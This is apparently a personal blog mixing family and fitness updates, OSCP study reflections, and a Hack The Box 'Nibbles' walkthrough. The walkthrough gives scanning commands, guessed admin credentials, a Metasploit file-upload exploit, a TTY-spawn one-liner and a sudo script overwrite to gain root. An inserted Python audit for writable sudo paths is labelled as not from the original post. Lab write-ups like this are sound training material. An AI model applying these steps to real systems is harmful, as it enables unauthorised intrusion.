Welcome to August.

While I am writing this, I am chilling in a hotel with my daughter, Mila, waiting for my wife and the little man, Andrew.  We are going to the beach for a week with my wife’s family, and it should be the bomb diggity (who says that?).


Look at this house – I am super pumped to spend a week here.

That being set aside, what is going on… well, Mila and I spent two weeks at my mom’s place with Paul, and while it was comfortable there, mom and I no longer see eye to eye.  She wanted to bond with my daughter, but didn’t spend any time getting to her level.  Rather, she used her guilt tactics on my 5 year old to drag her to places she didn’t want to go.  It got so bad that Mila would not be alone with my mom.  My mom and her husband are boomers who I don’t see eye to eye with politically, spiritually, and emotionally.  So we left early.  I couldn’t keep my daughter there anymore.  I think we are going to take a break from spending any time together like holidays, etc.  I’d rather spend it with people that are warming, and just full of gratitude and appreciation.  I just don’t understand what she is living for.

Well, I am still vegan, except for the last couple of weeks, and I feel awful.  I got to get back on the bandwagon, do some running, and watch what I put in my pie hole.  We’ll get back there.

As far as OSCP, I am losing it.  I can’t study right now as I am acting manager for my boss and things are insane.  It’s going to be nice to go back to my day job – I think I will pick back up OSCP studying in the AM.  I haven’t given up.

I still heart Illenium, Melodic Bass, Future Bass, Melodic Trap, all that music.

bye.

…and it’s April.

Yep, so I haven’t posted for a while.  Mainly because I have stuff to do and no one cares to read personal blog posts.  I most likely will keep things down to one or two personal posts a month.

So here’s #1 for April.  Yay!

So, what’s been going on?  Well, we are in the middle of the coronavirus lock-down so things have changed a bit.  We don’t venture too far from the house these days, eat in mostly, and spend a lot more time with the kiddos.

I have made it up to about 33 minutes of non-stop running, my 4 Miler got canceled, and now I am looking for motivation to keep running.  I think staying in shape and strong enough to not wear out quickly is enough motivation.

I am climbing the OSCP hill again with the new 2020 material.  No lab time yet – I am trying to get through the books first before I hit the labs.

Orthodox Easter was yesterday.  We had the couple that we are sharing a nanny with over and we did an Easter egg hunt for Mila and her friend, Diego.

Mila’s birthday is tomorrow.  I can’t believe she is going to be five.

That’s all I got for now.  Going to see if I can get a run in.  Still waking up early ftw!

2019 is a wrap!

What happened this year to me?!?!

  • My wife and I introduced Andrew to the world.  Yay!
  • I attempted my OSCP.  I’ll keep going on this.  I really want this cert so bad.
  • I reignited my love for books.  Right now I am reading Talking to Strangers.  Malcolm Gladwell has really opened my eyes to crazy biases we as humans have on strangers.  Be kind to your fellow stranger, peeps.
  • I had a think week – inspired by my man, Bill Gates.  It showed me that I can, with a shit ton of will and time, pass the OSCP.  But I should focus on my little man and my career at the moment.  So that is what I have decided to do.
  • Hung out with friends.  Brad and Kasia in some pretty fun cabins, got to know my co-workers outside of work a bit, and hung out with neighbors.
  • Volunteered with Bsides Charm city and DC and competed in Pros vs. Joes.  I felt much more comfortable with the competition this year than last year.
  • I went camping with my daughter at Bull Run Campgrounds.  It was really fun!  I think we will do this every year, for sure.
  • Traveled to Montreal and Mendoza with the family!  Both were awesome experiences and we had a great time.  Montreal more than Mendoza, but for both of them the whole family was together and that was really nice.
  • Went to NYC and Baltimore for work.  Nothing too far away this year.  I think RSA in San Francisco is on the docket for next year.

So… what are my new year’s resolutions?

  • I am going to go vegan in January.   A little kid and his mom in DC convinced me.  I am also really unhealthy weight-wise and I think trying vegan for not only the health benefits but respecting the planet, animals, and myself needs to be in order.
  • Meditate more.  I love meditation and it helps.  Even if it’s non-guided, I pledge to spend four days a week meditating.   Even if it’s for 5 min.
  • Focus on work for the long stretches.  I have some days where I have hours at a time to myself.    These times, I need to plan out what my goal is that day and do a Pomodoro for at least 2 hours (4 rounds).  This will keep me in step and not so worried about those big projects.
  • Be more extroverted.  I ruminate about saying the wrong thing, or not speaking up so I just don’t.  Then when I have to, it’s bad for me, but really, not all that bad in hindsight.  When I was a teenager, I thrived on relationships.  I need to be better at reaching out to people and saying hi.  We all need friends.
  • Couch to 5k.  Finish it.  I don’t want to put any more barriers around that other than I think if I run a routine three times a week, that should do it.  Once I finish out the program, sign up for a 5k and stay in shape for it.

Okay, that is it, people.  See you in 2020!!

Traverxec on HTB!

Yay!  I got another easy active box.  I am learning a lot about certain services and some privilege escalation.  It’s fun.  I am officially a script kiddie on hack the box.  haha

Well, back to work.

Root. On an active HTB. Woot!

Okay, so through working at the box for the most of yesterday and this morning, I friggen got user and root flags for Postman on HTB.  I am not gonna lie, I did reach out for a push or two through the HTB Discord Channel, but no major hints were given, and through a bit of perseverance, I did it. Yay!  Upwards and Onwards!

Anyone who is in this field, wow.  There is so much to learn that I don’t know, and it’s amazing to me to get in the chats and on the web and pore over the articles, cracks, and loopholes that some of the brightest people in this field have come across.  It takes major perseverance and sometimes that quick trip to the bathroom for an ah-ha moment that leads you further down the victory hole.

I have also been listening to another book by Cal Newport – So Good They Can’t Ignore You.  I haven’t gotten too far in the book to quickly start picking up things that resonate with me and give me some clarity on how I need to look a bit more at what I am doing here.  I was always in the mindset of “learning to love what you do rather than following what you love”.  Cal iterated this in the book by basically throwing shade on people who follow their passion.  Simply being that many of us don’t know our passion or think we do, only to ask “is this really what I want out of life?”

I go back to work from parental leave on Monday.  I haven’t been there for a while.  I want to bring about the “craftsman” mentality to my work – basically, it doesn’t matter what you do, just, in the words of Steve Martin – be so good they can’t ignore you.  I aspire to, every day, work towards this.  I have spent so much of my life caring about what people think.  I also have thought to myself – “I tried the OSCP once, so now I can add it to my resume and people will be lining up to ask me to come to be a pentester for them.”  I am so naive sometimes to myself.

I will stop caring so much about the meetings, the reflection of whether or not I have imposter syndrome, and just focus on the Deep Work of crafting myself into a better me, a more skilled me.  This is my modus operandi.  I will have two bars – one on getting better and more skilled at the policy/risk work I do for the government, and one on working at my technical competency through HTB/PentesterLab.  Then onto VHL, and then circle back to the OSCP, or maybe just get the eJPT.  (Why not?)

All this while adding exercise to my life (running in the AM with Sandy, the family dog, FTW) and being a good father/husband/trance addict.  Yeah, so I think Trance Junkie Podcast will have to wait till the kids are more independent and I can do simple things that don’t align with moving the bar forward for me.

I want to thank God and my wife for helping me find some clarity throughout this week.  Continuing to meditate and practice will help me move myself to where I want to be in a year.  What does that look like?  Well, it’s most likely not an OSCP cert, but it is someone who has moved the bar significantly closer to that cert, someone who is more confident at his job, and someone who continues to be amazed at the existence of his children.

My Co-op Work with CFMS

A couple of weeks ago, I was recognized in the Christian Family Montessori School’s Wednesday envelope for helping the school with their computers, printers, and network.

CFMS has a parent co-op to help keep the costs of school down. I get to make sure things are running smoothly. Such as:

  • Activating network ports
  • Securing their passwords effectively (.xls -> LastPass)
  • Getting the main printer to work on Mac, Win, and Chromebooks
  • Cleaning up old computers so they are able to run quicker
  • Migrating users from one computer to another
  • Migrating the school email to Gsuite, porting over old email
  • Ensuring connectivity to shared drives

It has been nice to sometimes reflect on the little things such as helping with basic IT that makes me feel like I know some things as I push forward to learn more in my PenTesting journey.

Hack The Box :: Nibbles Walk-through

Priv esc threw me for a loop on this one

This is a small win for me. It’s a retired box so there are a lot of walk-throughs on this one already. The user flag wasn’t too hard to get (minus simply guessing the credentials). It was escalating myself to root that took a while. The reason for this is that out of all the walk-throughs, none of the privesc could be replicated. I thought perhaps I could help by showing what I did, and if you somehow cross the web with the same issue, that this might be a crumb for you to push through.

First, I ran nmap on the target. I chose to be verbose on everything as my connection to the web is pretty poor at the moment.

nmap -sC -sV -oA initial -vvv 10.10.10.75
port 80 and 22

Looks like port 80 and 22 are open. So let’s mosey to http://10.10.10.75/.

Looking at the page source, I found /nibbleblog/ as a path in the URL.

Let’s go there.

So, generally, I would either run a nikto scan or gobuster. Let’s do a gobuster and see if there are any interesting findings.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -u http://10.10.10.75/nibbleblog/ -t 75
…go go gobuster!

Well, http://10.10.10.75/nibbleblog/admin.php looks super interesting.

Here is where there is an enumeration jump. If you go back to the blog, you will see a link for the atom feed: http://10.10.10.75/nibbleblog/feed.php. The title is nibbles. Also, looking at http://10.10.10.75/nibbleblog/content/private/users.xml shows admin as a user. So yah, play with that and you get the following:

Username: admin
Password: nibbles

I started looking for exploits at this point, and it looks like the best one requires metasploit: https://www.exploit-db.com/exploits/38489. So let’s do it.

root@kali:~# msfconsole

------SNIP--------

       =[ metasploit v5.0.58-dev                          ]
+ -- --=[ 1936 exploits - 1082 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nibbleblog

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Let’s use that module.

msf5 > use exploit/multi/http/nibbleblog_file_upload 

Set all the required options:

and send.

damn it feels good to get meterpreter…

drop into shell…

meterpreter > shell
Process 2902 created.
Channel 0 created.
id 
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image

Let’s spawn a TTY shell using the following command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Let’s go ahead and get the user.txt flag!

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt

Now, privesc. This was the hardest thing and took me a while to get it down. But finally, this article did me good, and I was able to work it out. One of the first things to figure out is whether there are any files that you can invoke as root. You do that by running the command:

sudo -l

So we can run /home/nibbler/personal/stuff/monitor.sh as root. Going into /home/nibbler, you are going to want to unzip personal.zip to get that monitor.sh file. Now we need to modify the monitor.sh file so that it contains the following code:

#!/bin/bash
/bin/bash -i

You can do this by appending it to the end of the existing file, by uploading the file with netcat and overwriting it, or by getting back to meterpreter and uploading the file. Make sure you make the file executable (chmod +x monitor.sh).

Then just run the following command:

nibbler@Nibbles:/home/nibbler$ sudo ./monitor.sh
I am root!

And there we go. Now to get the flag…

cat /root/root.txt
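As an added example (not code from the original post), here is a small Python audit a defender could run to catch the condition this box relies on: a sudo rule whose command lives in a path the invoking user can write, so the user can swap in their own script. It parses the command lines of `sudo -l` output and walks each absolute path up to the root, flagging the file or any ancestor directory the user can write; the directory layout and `sudo -l` text built in demo() are constructed, not taken from the box.

```python
import os
import re
import stat
import tempfile

# Command lines in `sudo -l` output look like "(root) NOPASSWD: /path/to/cmd args".
RULE_RE = re.compile(r"^\s*\([^)]*\)\s*(?:[A-Z]+:\s*)*(?P<cmd>\S+)")

def parse_sudo_l(output):
    """Return the command paths a user may run via sudo, from `sudo -l` text."""
    return [m["cmd"] for m in map(RULE_RE.match, output.splitlines()) if m]

def writable_by(path, uid, gids):
    """Can this uid / gid set modify or replace the object at `path`?"""
    try:
        st = os.stat(path)
    except OSError:
        return False
    if st.st_uid == uid:
        return True  # an owner can always chmod the object writable
    # Sticky dirs (e.g. /tmp) let others add files but not rename or remove
    # entries they do not own, so they do not make a contained path tamperable.
    if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
        return False
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)

def tamperable(path, uid, gids):
    """File plus every ancestor the user can write (a writable ancestor lets the user replace the file)."""
    hits, p = [], os.path.abspath(path)
    while True:
        if writable_by(p, uid, gids):
            hits.append(p)
        parent = os.path.dirname(p)
        if parent == p:
            return hits
        p = parent

def audit(sudo_l_output, uid, gids):
    """One (command, writable_components) finding per absolute-path sudo rule the user could abuse."""
    return [(cmd, hits) for cmd in parse_sudo_l(sudo_l_output)
            if cmd.startswith("/") and (hits := tamperable(cmd, uid, gids))]

def demo():
    """Constructed layout mirroring the Nibbles rule, audited as the script's owner and as uid 99999."""
    script_dir = os.path.join(tempfile.mkdtemp(), "personal", "stuff")
    os.makedirs(script_dir)
    script = os.path.join(script_dir, "monitor.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho monitoring\n")
    os.chmod(script, 0o755)
    sudo_l = f"User nibbler may run the following commands on Nibbles:\n    (root) NOPASSWD: {script}\n"
    return {"script": script, "as_owner": audit(sudo_l, os.getuid(), {os.getgid()}),
            "as_stranger": audit(sudo_l, 99999, set())}
```

The fix on a real host is to move such scripts under a root-owned, root-writable-only directory (or drop the rule), after which audit() returns nothing for that command.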

I thoroughly enjoyed this box. Please let me know this was helpful to you by DMing me on twitter @Mova. Thanks!

Update with a path forward…

For the last few days of parental leave, I will have some opportunity to reflect and decide if I would like to continue my OSCP journey. As of right now, the answer is yes. If others have done it, why not me? I think it’s pretty common to take a test, and if you fail it, flail around a bit before getting your grounding. I feel like I have regained some grounding and have a path forward. There are a few rocks on the path, but it’s a path nonetheless.

I have 6 days – between now and Saturday where I will have some time to myself to do some deep work and deep thinking about my professional competency. I am going to not only use this time to reflect on that but also do some minimal fasting, exercising, prayer, and meditation. I have a few habits that I need to place a stake in the ground on (little things) and work on my path forward with studying. I am inspired to do this through Bill Gates’ think-weeks, and also a book I listened to called “Deep Work: Rules for Focused Success in a Distracted World” by Cal Newport. Cal is a computer science teacher at Georgetown University, and his book spoke loads to me.

I have really been thinking about the amount of time that I take studying around OSCP. Things like Bash, Python, Linux, and Powershell. I think if I do that, I will never get to the actual pen-testing. I needed something structured, and just doing Hack the Box/VulnHub wasn’t structured.

Step in PentesterLab. It’s 30 bucks a month and structured. I really like the fact that there is a public profile where I can show the certs I managed to get along the way.

Woot! It’s some direction!

I read a bit about it, and even though it’s a bit more web app pen-testing than OSCP (which does cover web pen-testing, but also really focuses on network pen-testing), I really like it. I have done the intro labs and am working through *nix currently. To pull in more network pen-testing and the full methodology, I plan on doing a retired HTB machine walkthrough and an active machine on HTB daily – till Sat. I will have to re-assess once I am back at work and don’t have as much time to myself.

I have also been using this blog more like an emotional dump of my studying. This blog really was more for the technical aspects that I was working through on the OSCP, so I will gear it more to that moving forward. No one really cares how I feel all the time. 😛

Once and if I pull some substantial time into PentesterLab and HTB, then we’ll chat about the OSCP.

On to the work!

I feel so far from getting my OSCP… just a little burnt

I have been trying to study, but it’s been rough. My main priority has been my son, and that I think is a good thing. But right now, I have no work responsibility, and I am having a hard time working deep and smart. I am flailing around like a fish out of water.

I am thinking about working on the basics, but it’s just so rough getting through it. I want the sexy stuff, like working on a box all the way through to root. So I figured I would work on the basics for an hour and then do a VulnHub or a HTB… but it’s not working. I can’t think straight. I think I am a bit burnt out.

So I did BsidesDC, and I played in ProsvJoes, and I have to say, that I felt much better about it than I did last year….

I think I really still want this cert. Pressing forward, I will work on a VulnHub first and then dig into a basic again. I also need to think about when I will start the labs again. Maybe after things quiet down a bit from coming back to work.